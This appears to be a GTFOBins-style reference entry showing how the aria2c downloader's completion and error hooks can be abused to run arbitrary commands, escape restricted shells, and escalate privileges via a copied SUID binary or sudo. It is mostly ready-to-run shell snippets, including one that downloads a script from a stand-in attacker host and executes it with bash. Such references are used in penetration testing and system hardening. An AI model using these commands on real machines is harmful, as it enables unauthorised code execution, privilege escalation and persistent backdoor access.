.. / aria2c
Star

Note that the subprocess is immediately sent to the background.

Command

It can be used to break out from restricted environments by running non-interactive system commands.

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x

The remote file aaaaaaaaaaaaaaaa (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. --allow-overwrite is needed if this is executed multiple times with the same GID.
```
aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
```

SUID

It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian that allow the default sh shell to run with SUID privileges.

sudo sh -c 'cp $(which aria2c) .; chmod +s ./aria2c'

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
./aria2c --on-download-error=$TF http://x

Sudo

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo aria2c --on-download-error=$TF http://x

.. / aria2c Star

Command

SUID

Sudo

.. / aria2c
Star